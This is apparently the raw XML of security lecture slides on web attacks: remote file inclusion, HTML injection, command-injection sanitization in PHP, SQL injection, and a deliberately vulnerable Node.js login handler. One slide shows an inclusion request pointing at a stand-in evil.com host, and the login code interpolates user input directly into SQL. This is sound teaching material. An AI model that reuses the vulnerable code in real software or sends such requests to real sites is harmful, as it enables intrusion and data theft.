            <a:endParaRPr lang="en-US" sz="1300" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>include($includePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> . ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>math.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack (implies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>register_global</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>GET /includes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>library.php?includePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>www.evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18475728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Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The injection of HTML tags can be used to modify the behavior of a web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forms to collect user credentials can be injected in a legitimate web page (e.g., of a bank)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tags can be injected to force the browser to access a malicious web page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240448717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Preventing Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command injection is a sanitization problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never trust outside input when composing a command string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many languages provide built-in sanitization routines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is important to understand the context in which the user-provided data is used (shell execution, inclusion, etc.) and use the correct sanitization routine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253681613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Sanitization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strip_tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>): returns a string without HTML tags (it is possible to specify exceptions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, EN_QUOTE): translates all special characters (‘&amp;’, quotes, “&lt;”, “&gt;”) into the corresponding entities (&amp;amp; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; ...)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164132876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Sanitization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>escapeshellarg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>): adds single quotes around a string and quotes/escapes any existing single quotes allowing one to pass a string directly to a shell function and having it be treated as a single safe argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>escapeshellcmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>): escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands (#&amp;;`|*?~&lt;&gt;^()[]{}$\, \x0A and \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. ' and " are escaped only if they are not paired)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238365603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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="937987" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection might happen when queries are built using the parameters provided by the users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$query = “select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> from employees where </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>name = ‘” + username + “’ ”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using special characters such as ‘ (tick), -- (comment), + (space), @variable, @@variable (server internal variable), % (wildcard), it is possible to: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modify queries in an unexpected way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Probe the database schema and find out about stored procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run commands (e.g., using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xp_commandshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in MS SQL Server)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2177918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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="820227" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A request is composed of a header  and a body (optional) separated by an empty line (CR LF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The header specifies:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Method (GET, HEAD, POST, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Resource (e.g., /hypertext/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>doc.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Protocol version (HTTP/1.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Other info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>General header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Request header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Entity header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The body is considered as a byte stream</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3228708930"/>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A32A-B671-0F45-B01D-2EEF23763A34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerable Server (Node.js)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42C15F63-8644-2917-1F79-B0D24CBB133A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('/login', (req, res) =&gt; {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>res.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    &lt;form action="/login" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      &lt;input type="text" name="username" placeholder="Username" required /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      &lt;input type="password" name="password" placeholder="Password" required /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      &lt;button type="submit"&gt;Login&lt;/button&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    &lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  `);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Login Post Handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app.post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('/login', (req, res) =&gt; {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  const { username, password } = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>req.body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(`SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`, function(err, row) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if (err) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>res.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(500).send("Error in database operation: " + err);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    } else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      if (row) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>res.redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('/main’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    } else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>res.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Invalid username or password");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
